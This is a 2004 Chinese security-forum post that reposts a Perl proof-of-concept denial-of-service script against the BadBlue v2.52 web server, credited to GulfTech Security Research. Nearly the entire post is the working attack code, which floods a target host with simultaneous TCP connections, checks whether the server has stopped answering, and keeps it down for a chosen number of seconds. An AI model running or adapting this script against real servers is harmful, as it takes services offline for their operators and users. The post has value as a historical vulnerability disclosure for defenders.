‹‹ 上一主题 | 下一主题 ››
发新话题
打印

BadBlue v2.52 Web Server Multiple Connections DoS Example

冰血封情

老林

团队决策人

Rank: 9Rank: 9Rank: 9

E.S.T运营责任人

帖子
6825 
精华
834 
积分
36073 
阅读权限
255 
性别
男 
来自
中国 
在线时间
590 小时 
注册时间
2004-6-25 
最后登录
2008-10-6 

优秀管理奖 资料收集奖 原创技术奖 核心建议奖

楼主 发表于 2004-9-27 23:00  只看该作者

BadBlue v2.52 Web Server Multiple Connections DoS Example

信息来源:GulfTech Security Research
复制内容到剪贴板
代码:
#!/usr/bin/perl
##############################################################
# BadBlue v2.52 Web Server - Multiple Connections DoS Example
##############################################################
# BadBlue Web Server can not handle many simultaneous connects
# from the same host, and will lock up until the connects stop
##############################################################
# This Proof Of Concept Written By GulfTech Security Research
##############################################################

  use Strict;
  use Socket;
  use IO::Socket;

  my $host = $ARGV[0];
  my $port = $ARGV[1];
  my $stop = $ARGV[2];
  my $size = 1000;
  my $prot = getprotobyname('tcp');
  my $slep = $ARGV[3];


if (!$ARGV[3]) {
printf("================================================\n");
printf(" BadBlue v2.52 Web Server Denial Of Service POC \n");
printf("================================================\n");
printf("[*] badblue.pl host port connections duration  \n");
exit
}

printf("================================================\n");
printf(" BadBlue v2.52 Web Server Denial Of Service POC \n");
printf("================================================\n");
printf("[*] Making %d Connections To %s \n", $stop , $host);

for ($i=1; $i<$stop; $i++)
{
  socket($i, PF_INET, SOCK_STREAM, $prot );
  my $dest = sockaddr_in ($port, inet_aton($host));
  connect($i, $dest);
}

  CheckServer($host, $i, $slep, $stop);
  KillThreads($stop);
  printf("[*] Exploit Attempt Unsuccesful");
  exit;

sub CheckServer($host, $i, $slep, $stop) {
  ($host, $i, $slep, $stop) = @_;
  $blank  = "\015\012" x 2;
  $request = "GET / HTTP/1.0".$blank;
  $remote  = IO::Socket::INET->new( Proto => "tcp",
                         PeerAddr  => $host,
                         PeerPort  => $port,
                         Timeout  => &#39;10000&#39;,
                         Type    => SOCK_STREAM,
                        );  
  print $remote $request;
  unless ( <$remote> )
  {
    printf("[*] Host %s Has Been Successfully DoS&#39;ed\n", $host);
    printf("[*] The Host Will Be Down For %d Seconds\n", $slep);
    sleep($slep);
    KillThreads($stop);
    exit;
  }
}

sub KillThreads($stop) {
$stop = @_;
printf("[*] Killing All active Connections");
for ($l=1; $l<$stop; $l++) {
  shutdown($l,2)|| die("Couldn&#39;t Shut Down Socket");
  $l++;
}
}
qq310926是我唯一用号,除此之外有其他号码号自称邪八冰血封情,则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题